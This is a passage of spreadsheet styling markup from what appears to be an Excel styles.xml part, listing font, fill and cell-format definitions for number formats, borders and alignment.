      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="18"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="7"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="16"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="24"/>
      <color theme="0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color rgb="FFFFFF00"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="20"/>
      <color theme="0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color rgb="FF00B0F0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="28"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="16"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="8"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="6"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="7"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1" tint="0.499984740745262"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="7"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="Dialog"/>
    </font>
    <font>
      <sz val="8"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="7"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="7"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="5">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF30393D"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="2" tint="-0.249977111117893"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="3" tint="0.39997558519241921"/>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0" fontId="2" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="205">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NumberFormat="1"/>
    <xf numFmtId="22" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="22" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="46" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="46" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="164" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="164" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="46" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="164" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="2"/>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="7" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="8" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="2" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="165" fontId="2" fillId="0" borderId="2" xfId="1" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="2" fillId="0" borderId="1" xfId="1" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="3" xfId="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="2" fillId="0" borderId="9" xfId="1" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="2" fillId="0" borderId="4" xfId="1" applyNumberFormat="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="4" xfId="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="10" xfId="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="46" fontId="14" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="164" fontId="14" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="46" fontId="15" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="164" fontId="15" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="14" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="166" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="46" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" pivotButton="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="18" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" pivotButton="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="14" xfId="0" pivotButton="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="166" fontId="1" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" pivotButton="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" pivotButton="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="2" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="2" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="20" fillId="0" borderId="5" xfId="1" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="165" fontId="20" fillId="0" borderId="6" xfId="1" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="14" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="15" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="16" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" pivotButton="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="10" fontId="4" fillId="0" borderId="11" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="4" fillId="0" borderId="12" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="26" fillId="0" borderId="14" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="26" fillId="0" borderId="15" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="26" fillId="0" borderId="16" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="27" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="27" fillId="0" borderId="16" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="18" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="4" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="0" xfId="0" applyNumberFormat="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="4" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="11" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="14" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="15" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="12" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="16" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="21" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="0" xfId="0" applyNumberFormat="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="46" fontId="28" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="164" fontId="28" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="0" borderId="0" xfId="0" pivotButton="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="0" borderId="0" xfId="0" pivotButton="1" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="16" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="4" fillId="0" borderId="21" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="4" fillId="0" borderId="22" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="4" fillId="0" borderId="23" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" pivotButton="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" pivotButton="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="31" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="46" fontId="32" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="164" fontId="32" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="167" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="168" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="169" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="169" fontId="33" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="169" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="2" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="2" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="10" fontId="4" fillId="0" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="4" fillId="0" borderId="19" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="4" fillId="0" borderId="15" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="21" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="19" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="22" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="15" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="4" fillId="0" borderId="20" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="4" fillId="0" borderId="16" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="14" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="20" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="16" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="23" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="12" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="23" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="20" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="27" fillId="0" borderId="12" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="27" fillId="0" borderId="23" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="16" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="27" fillId="0" borderId="20" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="25"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24" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="26" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
